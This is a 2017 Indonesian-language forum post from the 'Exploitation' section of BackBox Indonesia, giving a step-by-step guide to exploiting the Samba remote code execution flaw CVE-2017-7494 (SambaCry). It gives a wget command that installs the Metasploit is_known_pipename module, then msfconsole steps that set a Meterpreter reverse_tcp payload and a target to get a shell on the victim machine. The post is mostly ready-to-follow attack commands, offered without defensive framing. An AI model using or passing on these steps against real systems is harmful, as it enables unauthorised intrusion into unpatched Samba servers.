![]() |
Samba Exploit (CVE-2017-7494) SambaCry? - Printable Version +- BackBox Indonesia (https://www.backboxindonesia.or.id) +-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html) +--- Forum: Exploitation (https://www.backboxindonesia.or.id/forum-13.html) +--- Thread: Samba Exploit (CVE-2017-7494) SambaCry? (/thread-224.html) |
Samba Exploit (CVE-2017-7494) SambaCry? - penjagalilin - 06-14-2017 Setelah beberapa waktu lalu sempet tenar WannaCry dengan memakai SMB Exploit (EternalBlue & DoublePulsar) di Windows, sesaat kemudian juga ditemukan vulnerability di OS keluarga Linux yang menjalankan SAMBA sebagai file-sharing daemon nya. Samba Exploit ini dapat menyerang service Samba versi 3.5.0 sampai 4.4.14, 4.5.10, and 4.6.4. Lebih tepatnya exploit ini memanfaatkan bug writeable file pada versi Samba tersebut untuk melakukan RCE (Remote Code Execution) di komputer korban. 1. Dapatkan module Metasploit dari Samba Exploit (is_known_pipename.rb) Code: root@attackermachine~:# wget https://github.com/rapid7/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb -O /opt/metasploit-frameworks/modules/exploits/linux/samba/sambacry.rb Keterangan : wget akan mengunduh file is_known_pipe_name.rb dan akan menaruhnya di direktori Metasploit Framework dengan nama sambacry.rb Dalam hal ini bisa saja letak direktori Metasploit Framework kalian bukan di /opt/ 2. Jalankan msfconsole dan mulai exploitasi Code: root@attackermachine~:# msfconsole Keterangan : Jika architecture OS korban adalah 32bit maka : set PAYLOAD linux/meterpreter/reverse_tcp Untuk set TARGET saya memilih opsi 3, jalankan perintah show targets untuk melihat list architecture target yang tersedia. ![]() 3. Jika exploitasi berhasil, maka akan muncul tampilan seperti berikut ![]() Bonus video : Oke sekian post nya, semoga bermanfaat. Terimakasih. |